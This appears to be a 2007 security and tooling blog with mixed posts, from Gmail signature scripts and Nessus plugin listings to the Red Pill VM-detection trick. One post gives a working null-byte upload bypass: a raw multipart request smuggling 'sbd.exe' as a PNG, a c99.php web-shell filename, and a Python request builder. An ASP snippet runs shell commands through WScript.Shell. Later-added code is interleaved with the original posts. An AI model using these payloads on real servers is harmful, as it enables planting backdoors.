Dim wshell, intReturn
Set wshell = Server.CreateObject("WScript.Shell")
' Run(command, windowStyle, waitOnReturn) returns the process exit code
intReturn = wshell.Run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write intReturn
Set wshell = Nothing
%>


Curl into older PHP servers from chroot skeletons.

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$file = curl_exec($ch);
print_r(curl_getinfo($ch)); // transfer details are only populated after curl_exec()
curl_close($ch);

echo '<br>Post Curl<br>';
print $file;
?>


Null Bytes
PHP garbage
The null byte is sent as '%00' in a URL; PHP keeps it in the string, but the C-level file calls underneath stop at it:
C:\c99.php%00.jpg

CGI null byte stuff too..
see... php null byte

ASP null byte
When a filename is sent using a multipart/form-data POST, the null byte is
included in the filename variable, thus affecting calls to the FileSystemObject.

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe<NUL>.png"
Content-Type: text/plain

[file contents]
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"

Upload
-----------------------------AAAAAAAAAAAAA--

(<NUL> stands for a literal 0x00 byte in the request body, and Content-Length has to match the real body length.)
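Because the NUL has to travel as a raw byte, the request is easier to build than to type. The Python below is an added example (not from the original post): it assembles the multipart body with the 0x00 embedded in the filename, and shows the two views of that filename, the full string an extension allow-list sees versus the C-string a FileSystemObject or CreateFile call sees. The field name ExploitFile is taken from the request above; the /upload.asp path and the "MZ" file content are assumptions.

```python
import os


def multipart_body(boundary: bytes, field: bytes, filename: bytes, content: bytes) -> bytes:
    """Raw multipart/form-data body; filename is bytes so a NUL goes on the wire as-is."""
    return (
        b"--" + boundary + b"\r\n"
        + b'Content-Disposition: form-data; name="' + field
        + b'"; filename="' + filename + b'"\r\n'
        + b"Content-Type: text/plain\r\n\r\n"
        + content + b"\r\n"
        + b"--" + boundary + b"--\r\n"
    )


def request(boundary: bytes, filename: bytes, content: bytes) -> bytes:
    """Full HTTP/1.0 request with a correct Content-Length for the built body."""
    body = multipart_body(boundary, b"ExploitFile", filename, content)
    headers = (
        b"POST /upload.asp HTTP/1.0\r\n"          # assumed path
        + b"Host: localhost\r\n"
        + b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
        + b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n"
    )
    return headers + body


def ext_check_passes(filename: bytes, allowed=(b".png", b".jpg", b".gif")) -> bool:
    """What a script-level allow-list sees: the whole string, so the trailing
    .png after the NUL looks like the extension."""
    return os.path.splitext(filename)[1].lower() in allowed


def c_string(filename: bytes) -> bytes:
    """What a C API underneath (FileSystemObject, CreateFile, fopen) sees:
    the string ends at the first NUL."""
    return filename.split(b"\x00", 1)[0]


def content_length_matches(req: bytes) -> bool:
    """Sanity check: declared Content-Length equals the actual body length."""
    head, body = req.split(b"\r\n\r\n", 1)
    declared = int(head.split(b"Content-Length: ")[1].split(b"\r\n")[0])
    return declared == len(body)


# Constructed sample filename with the embedded NUL.
SAMPLE_FILENAME = b"c:\\sbd.exe\x00.png"
```

The fix on the receiving side is to reject any filename containing 0x00 before it reaches a file API (and to derive the stored name yourself rather than trust the client's), which closes the gap between the two views instead of hoping the allow-list runs last.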

20070215

Gmail HTML Signatures - GreaseMonkey script

So of course you can't create HTML signatures in Gmail... ergg!

Silly rabbit, you can drag and drop images/html into the Gmail rich-text editor...
well that just will not do.

So that would mean - Greasemonkey script! I'm not going to waste any time here.
GMAIL HTML SIGNATURE - Install this Script
//
// Released under the CC Attribution 2.5 license
// http://creativecommons.org/licenses/by/2.5/
// --------------------------------------------------------------------
//
// This is a Greasemonkey user script.
//
// To setup, insert html signature code into:
// * html_signature
// --------------------------------------------------------------------
//
// ==UserScript==
// @name GMAIL HTML Signature
// @namespace http://shad0wbq.answorld.com/
// @description Insert HTML signature into GMAIL
// @include http://gmail.google.com/*
// @include https://gmail.google.com/*
// @include http://mail.google.com/*
// @include https://mail.google.com/*
// ==/UserScript==
//
var html_signature = '<div style="margin: 0 auto 0 auto; margin-top: 5px; margin-bottom: 5px;" >' +
'<a href="http://feeds.feedburner.com/Codeburst">' +
'<img src="http://feeds.feedburner.com/Codeburst.gif" style="border:0" alt="codeBurst"/>' +
'</a></div>';

window.setTimeout(function() {
//Debug Frame window
// alert(window.frames[0].name);
if (window.frames[0])
{
if (window.frames[0].name == "v2_hc_compose")
{
var logo = window.frames[0].document.createElement("div");
logo.innerHTML = '<br><br>' + html_signature;
window.frames[0].document.body.insertBefore(logo,window.frames[0].document.body.lastChild);
}
}
}, 600);

20070212

del.icio.us Regex

I was working on bringing my collection of bookmarks into del.icio.us. There is still some work to be done on the del.icio.us web interface, and most of the API apps I tried just didn't fit the bill, so some quick regex helped with importing and exporting.

The main use for this was to enable sharing on all imported bookmarks.

So we need some regex to turn the export into API calls.

del.icio.us can read and export Netscape bookmark files:

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Bookmarks</title>
<h1>Bookmarks</h1>
<dl><p>
<dt><a href="http://www.testtest.com/" last_visit="117002438" add_date="117002438" tags="wee,w00t">test test</a>
</dt></dl>

These can very easily be turned into API calls via regex.
Example API calls
https://api.del.icio.us/v1/posts/add?&url=http://www.testtest.com/&description=test test&tags=wee%20w00t&replace=yes&shared=yes
https://api.del.icio.us/v1/posts/delete?&url=http://www.testtest.com/


Regex conversion for del.icio.us (search, then replace; \2 is the UR
L, \4 the tags, \6 the title; the URL group stops at the closing quote so the last_visit/add_date attributes in between are skipped)
(<dt><a href=")([^"]*)(".*tags=")(.*)(">)(.*)(</a></dt>)
https://api.del.icio.us/v1/posts/add?&url=\2&description=\6&tags=\4&replace=yes&shared=yes
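The same conversion done properly, added here as an example rather than taken from the post: attributes in the Netscape export come in varying order, so each attribute is matched on its own instead of positionally, entities are decoded, and the API query is URL-encoded (the raw regex substitution above leaves spaces and ampersands in the title unencoded). The bookmark file is constructed from the page's example plus one entry with an entity and no tags; the /delete call mirrors the example above.

```python
import html
import re
from urllib.parse import urlencode

# One <DT><A ...>title</A> per bookmark; attribute order varies between exporters.
RE_LINK = re.compile(r"<dt><a\s+([^>]*)>(.*?)</a>", re.I | re.S)
RE_ATTR = re.compile(r'(\w+)="([^"]*)"')

API = "https://api.del.icio.us/v1/posts"

# Constructed Netscape bookmark file.
SAMPLE_BOOKMARKS = """<dl><p>
<dt><a href="http://www.testtest.com/" last_visit="117002438" add_date="117002438" tags="wee,w00t">test test</a>
<dt><a href="http://example.org/?a=1&amp;b=2" add_date="117002500">Tom &amp; Jerry</a>
</dl>"""


def parse_bookmarks(text):
    """Yield {'url', 'description', 'tags'} for each bookmark line."""
    for m in RE_LINK.finditer(text):
        attrs = {k.lower(): v for k, v in RE_ATTR.findall(m.group(1))}
        if "href" not in attrs:
            continue
        yield {
            "url": html.unescape(attrs["href"]),
            "description": html.unescape(m.group(2)).strip(),
            "tags": [t for t in attrs.get("tags", "").split(",") if t],
        }


def add_call(bm, shared=True):
    """posts/add URL; tags are space-separated in the API, all values URL-encoded."""
    query = {
        "url": bm["url"],
        "description": bm["description"],
        "tags": " ".join(bm["tags"]),
        "replace": "yes",
        "shared": "yes" if shared else "no",
    }
    return API + "/add?" + urlencode(query)


def delete_call(bm):
    return API + "/delete?" + urlencode({"url": bm["url"]})


def convert(text, shared=True):
    """The whole export as a list of posts/add URLs."""
    return [add_call(bm, shared) for bm in parse_bookmarks(text)]
```

convert() hands back one URL per bookmark; issue them with basic auth against the API with whatever HTTP client you like, and replace=yes keeps re-runs idempotent.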

20070207

Dirty Listing of Nessus Dangerous Plugins

Tenable Nessus .. needed the dangerous plugin descriptions (plugins whose script_category is ACT_DESTRUCTIVE_ATTACK or ACT_DENIAL)

cd \progra~1\tenable\nessus\plugins\scripts\
egrep -l "(ACT_DESTRUCT|ACT_DENIAL)" *.nasl > c:\temp\dangerous_list.txt


Quick vbs file..
Copy the files listed in dangerous_list.txt to c:\temp\scripts (the folder must exist).

Dim objFileSystem, objInputFile, aFile
Dim strListFile, strScriptDir, Line

Const OPEN_FILE_FOR_READING = 1

strListFile = "c:\temp\dangerous_list.txt"
strScriptDir = "c:\progra~1\tenable\nessus\plugins\scripts\"

Set objFileSystem = CreateObject("Scripting.FileSystemObject")
Set objInputFile = objFileSystem.OpenTextFile(strListFile, OPEN_FILE_FOR_READING)

' one plugin filename per line
Do While Not objInputFile.AtEndOfStream
    Line = Trim(objInputFile.ReadLine)
    If Line <> "" Then
        Set aFile = objFileSystem.GetFile(strScriptDir & Line)
        aFile.Copy "c:\temp\scripts\" & Line
        Set aFile = Nothing
    End If
Loop

objInputFile.Close
Set objFileSystem = Nothing

WScript.Quit(0)

Grab the nessus extract tool via wget, dump the info to a file .. done.

wget "http://cvsweb.nessus.org/cgi-bin/viewcvs.cgi/*checkout*/nessus-tools/nessus-extract/nessus-extract.pl?rev=1.4.2.10&content-type=text/plain" -O nessus_extract.pl

perl nessus_extract.pl -p "c:\temp\scripts" > c:\temp\Dangerous_Plugins.txt
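The grep-then-vbs-then-perl chain above, and the CVE / BID de-duplication problem from the "Comparing Common Vulnerability Result Sets" post, both come down to pulling a few fields out of unstructured .nasl text. The Python below is an added example (not nessus_extract.pl and not the author's code): it reads a plugin directory, picks out script_category, script_name, script_cve_id and script_bugtraq_id, filters on the dangerous categories, and writes the pipe-inside-a-cell CSV the earlier post describes. The three plugin files it writes to a temp directory are constructed stand-ins, not real Nessus plugins.

```python
import csv
import io
import os
import re
import tempfile

# ACT_DESTRUCT matches ACT_DESTRUCTIVE_ATTACK; the other two are the remaining
# categories that can take a host down.
DANGEROUS = {"ACT_DENIAL", "ACT_DESTRUCTIVE_ATTACK", "ACT_KILL_HOST", "ACT_FLOOD"}

RE_CATEGORY = re.compile(r"script_category\s*\(\s*(ACT_[A-Z_]+)\s*\)")
# old plugins use script_name(english:"..."), newer ones script_name("...")
RE_NAME = re.compile(r'script_name\s*\(\s*(?:english\s*:\s*)?"([^"]*)"')
RE_CVE = re.compile(r"CVE-\d{4}-\d{4,}")
RE_BID = re.compile(r"script_bugtraq_id\s*\(([^)]*)\)")

# Constructed plugin stubs with the description-block calls the parser needs.
SAMPLE_SCRIPTS = {
    "fake_dos.nasl": '''
if (description) {
  script_id(900001);
  script_cve_id("CVE-2006-0001", "CVE-2006-0002");
  script_bugtraq_id(16001, 16002);
  script_name(english:"Example Service Remote DoS");
  script_category(ACT_DENIAL);
  exit(0);
}
''',
    "fake_info.nasl": '''
if (description) {
  script_id(900002);
  script_name("Example Service Version Detection");
  script_category(ACT_GATHER_INFO);
  exit(0);
}
''',
    "fake_overflow.nasl": '''
if (description) {
  script_id(900003);
  script_cve_id("CVE-2006-0003");
  script_bugtraq_id(16003);
  script_name(english:"Example Service Buffer Overflow (destructive check)");
  script_category(ACT_DESTRUCTIVE_ATTACK);
  exit(0);
}
''',
}


def parse_nasl(text):
    """Category, name and de-duplicated CVE / BID lists from one plugin's source."""
    cat = RE_CATEGORY.search(text)
    name = RE_NAME.search(text)
    bids = []
    for m in RE_BID.finditer(text):
        bids += re.findall(r"\d+", m.group(1))
    return {"category": cat.group(1) if cat else None,
            "name": name.group(1) if name else None,
            "cve": sorted(set(RE_CVE.findall(text))),
            "bid": sorted(set(bids), key=int)}


def scan_dir(path):
    rows = []
    for fn in sorted(os.listdir(path)):
        if fn.endswith(".nasl"):
            with open(os.path.join(path, fn), encoding="utf-8", errors="replace") as fh:
                rec = parse_nasl(fh.read())
            rec["file"] = fn
            rows.append(rec)
    return rows


def dangerous(rows):
    return [r for r in rows if r["category"] in DANGEROUS]


def to_csv(rows):
    """One row per plugin; several CVE / BID values share one cell, pipe-separated."""
    buf = io.StringIO()
    w = csv.writer(buf, quoting=csv.QUOTE_ALL)
    w.writerow(["file", "category", "name", "cve", "bid"])
    for r in rows:
        w.writerow([r["file"], r["category"] or "", r["name"] or "",
                    "|".join(r["cve"]), "|".join(r["bid"])])
    return buf.getvalue()


def demo():
    """Write the constructed plugins to a temp dir and run the pipeline."""
    d = tempfile.mkdtemp(prefix="nasl_")
    for fn, body in SAMPLE_SCRIPTS.items():
        with open(os.path.join(d, fn), "w", encoding="utf-8") as fh:
            fh.write(body)
    rows = scan_dir(d)
    return rows, dangerous(rows), to_csv(dangerous(rows))
```

Point scan_dir() at the real plugins\scripts directory and the CSV keyed on CVE / BID is what you join against the other scanner's output to drop the duplicates.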

20070122

Apache redirect direct linked images...

don't direct link images .. bad things happen
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http[s]?://(www\.)?yoururl\.com/.*$ [NC]
# keep the replacement image itself out of the rule so it can't re-match
RewriteCond %{REQUEST_URI} !redirected_image\.jpg$
RewriteRule \.(gif|jpg|jpeg|bmp)$ redirected_image.jpg [L]
- credit fif3

20070111

Detecting VMMs - virtual machine monitors

Red Pill...

/* Joanna Rutkowska's Red Pill: SIDT stores the IDTR without a privilege
 * check, and a VMM relocates the guest IDT far above where a native OS keeps
 * it (0xffXXXXXX under VMware, 0xe8XXXXXX under Virtual PC). 32-bit x86 only,
 * the byte string must be executable (no NX on the stack), and on multi-core
 * hosts each CPU has its own IDT, so results vary with the core you land on. */
int swallow_redpill () {
    unsigned char m[2+4], rpill[] = "\x0f\x01\x0d\x00\x00\x00\x00\xc3"; /* sidt [imm32]; ret */
    *((unsigned*)&rpill[3]) = (unsigned)m;   /* patch the sidt operand with m's address */
    ((void(*)())&rpill)();                   /* execute the byte string */
    return (m[5]>0xd0) ? 1 : 0;              /* high byte of the IDT base */
}


redpill.c

redpill.exe
TrapKit.de info..

VMware fingerprint codes
scoopy doo - A VMware Fingerprint Suite

jerry - A(nother) VMware Fingerprinter

20070104

Northern Virginia Security Groups

NoVA Sec

Pure technical gatherings for security professionals in the northern Virginia area. Check your certifications at the door

http://novasec.blogspot.com/

OWASP NoVA
OWASP chapter meetings are free and open to anyone interested in application security.
http://www.owasp.org/

20070103

MOAB / MOKB / VIZSEC '06

Well, to catch up a little on the vuln world.. there are a couple of things I'm watching.

Month of Apple Bugs

Info-Pull's MoAB

PoC/exploits are included with every release.. how nice.

Month of Kernel Bugs

Info-Pull's MoKB

Numerous kernel bugs listed for FreeBSD 6.1, Linux 2.6, as well as OS X.


Retirement of Elsenot.com
ElseNot has officially closed its doors for updates..
"ElseNot part one is done. ElseNot part two may or may not start." ~ Layne


Conference VIZSEC '06

The proceedings for the conference held on November 3rd 2006 have been posted. There are a lot of really interesting white papers.. here are a couple of interest..

2D Visualizations
"VAST: Visualizing Autonomous System Topology"

- Jon Oberheide, Manish Karir and Dionysus Blazakis [whitepaper] [presentation]

"FlowTag: A Collaborative Attack-Analysis, Reporting, and Sharing Tool for Security Researchers"

- Christopher P. Lee and John A. Copeland [whitepaper] [presentation]

"Understanding Multistage Attacks by Attack-Track based Visualization of Heterogeneous Event Streams"

- Sunu Mathew, Richard Giomundo, Shambhu J. Upadhyaya, Moises Sudit, Adam Stotz [whitepaper] [presentation]

"Visual Toolkit for Network Security Experiment Specification and Data Analysis"

- Lunquan Li, Peng Liu, George Kesidis [whitepaper] [presentation]

"An Intelligent, Interactive Tool for Exploration and Visualization of Time-Oriented Security Data"

- Asaf Shabtai, Denis Klimov, Yuval Shahar, and Yuval Elovici[whitepaper] [presentation]

"Visualizing DNS Traffic"

- Pin Ren, John Kristoff and Bruce Gooch [whitepaper] [presentation]


3D Visualizations
"Interactively Combining 2D and 3D Visualization for Network Traffic Monitoring"

- Erwan Le Malecot, Masayoshi Kohara, Yoshiaki Hori, and Kouichi Sakurai [whitepaper] [presentation]

"Real-Time Collaborative Network Monitoring and Control Using 3D Game Engines for Representation and Interaction"

- Warren Harrop and Grenville Armitage [whitepaper] [presentation]